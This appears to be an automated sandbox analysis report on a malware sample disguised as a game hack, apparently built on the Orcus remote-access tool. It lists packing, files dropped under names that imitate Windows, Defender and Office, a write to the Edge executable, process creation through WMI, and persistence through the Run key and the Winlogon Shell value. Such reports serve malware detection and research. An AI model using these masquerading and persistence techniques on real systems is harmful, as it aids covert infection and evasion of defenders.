                      Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.directoryinfoex.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: opuswrapper7costura.opuswrapper.dll.zip7costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: MpDefenderProtector.exe, 00000007.00000002.1315906643.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1335917183.0000000005270000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2071723679.000000000425D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shelllibrary9costura.shelllibrary.dll.zip9costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.utilities.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeUnpacked PE file: 9.2.Solara.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW; vs .MPRESS1:ER;.MPRESS2:ER;
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\__tmp_rar_sfx_access_check_3872640Jump to behavior
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: section name: .didat
                      Source: Solara.exe.0.drStatic PE information: section name: .MPRESS1
                      Source: Solara.exe.0.drStatic PE information: section name: .MPRESS2
                      Source: GameHack.exe.0.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1E28C push eax; ret 0_2_00A1E2AA
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1ED46 push ecx; ret 0_2_00A1ED59
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEE28C push eax; ret 8_2_00EEE2AA
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEED46 push ecx; ret 8_2_00EEED59
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: containerRuntime.exe.8.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: SSblKNNQege.exe.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: RuntimeBroker.exe.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: SSblKNNQege.exe0.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: SSblKNNQege.exe1.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: SSblKNNQege.exe2.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: SSblKNNQege.exe3.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: SSblKNNQege.exe4.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: SSblKNNQege.exe5.26.drStatic PE information: section name: .text entropy: 7.132224051774889
                      Source: RuntimeBroker.exe0.26.drStatic PE information: section name: .text entropy: 7.132224051774889

                      Persistence and Installation Behavior

                      barindex
                      Creates processes via WMI
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\BpJZMyRc.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\ErvIhhWY.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\syFrxmlp.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeFile created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\wowiEjmi.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\QLuoYXmy.logJump to dropped file
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\mOMkzqHG.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\jdhUscxN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\Cursors\OfficeClickToRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Recovery\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\brpMezGb.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Users\Default\Pictures\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Program Files\Microsoft\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\PxMOoBdB.logJump to dropped file
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Program Files\Windows Portable Devices\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\security\database\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Program Files (x86)\Microsoft Office\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeFile created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\L2Schemas\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\WmQvmhxk.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\security\database\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\Cursors\OfficeClickToRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\L2Schemas\SSblKNNQege.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\PxMOoBdB.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\WmQvmhxk.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\mOMkzqHG.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\BpJZMyRc.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\jdhUscxN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\QLuoYXmy.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\wowiEjmi.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\ErvIhhWY.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\syFrxmlp.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\Desktop\brpMezGb.logJump to dropped file

                      Boot Survival

                      barindex
                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
